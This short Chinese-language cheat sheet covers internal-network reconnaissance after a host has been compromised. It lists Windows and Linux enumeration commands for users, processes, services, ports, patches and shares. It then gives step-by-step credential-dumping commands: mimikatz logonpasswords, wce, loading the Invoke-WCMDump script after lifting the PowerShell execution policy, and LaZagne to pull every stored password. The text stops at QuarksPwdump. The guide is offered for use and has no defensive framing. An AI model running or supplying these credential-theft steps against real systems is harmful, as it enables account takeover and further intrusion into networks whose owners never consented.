内网信息搜集

一、用户列表

windows：net user

    

linux：vim /etc/passwd

    

二、进程信息

windows：tasklist

    

杀死某个进程：taskkill  /pid  pid号  /f

    

linux：ps aux

    

 top

    

三、服务类别

windows：net start

    

linux：chkconfig --list

    

 service --status-all

    

四、端口列表

windows：netstat -ano

    

linux：查看所有得tcp端口：netstat -anpt

    

查看所有得tcp和udp端口：netstat -anptu

    

查看所有得开放端口：netstat -anptul

    

五、补丁列表

wndows：systeminfo

    

  查看补丁的详细信息：wmic qfe list full

    

linux：查看系统内核：uname -a

    

查看具体程序的补丁情况：rpm -qa | grep ssh

    

六、本机共享 

windows：net share

  

七、本地用户习惯

windows：可查看用户的家目录，比如以下文件

   

八、当前用户密码(这里的密码不止登陆密码，还有用户登录 一些网址的密码)

window：

1.mimikatz（在win2008服务器上）

输入：

mimikatz.exe privilege::debug 
sekurlsa::logonpasswords

  

2.wce

wce.exe -l    列出密码和凭证

  

 wce -lv  读取sam文件的密码

 3.lvoke-WCMDump

上传该脚本到win8服务器，利用win8自带得powershell，获取凭证用户名和密码

（1）修改策略为可加载 脚本

Set-ExecutionPolicy unrestricted

  

（2）加载Invoke-WCMDump脚本

Import-Module .\Invoke-WCMDump.ps1

  

（3）输入脚本名Ivoke-WCMDump运行

  

4.LaZagne

LaZagne是一款用于检索大量存储在本地计算机密码的开源应用程序。 因为每个软件储存密码的方式不尽相同（明文、API、定制算法、数据库等），所以该工具使用多种方法获取软件密码

lazagne.exe all 查看所有

 5.QuarksPwdump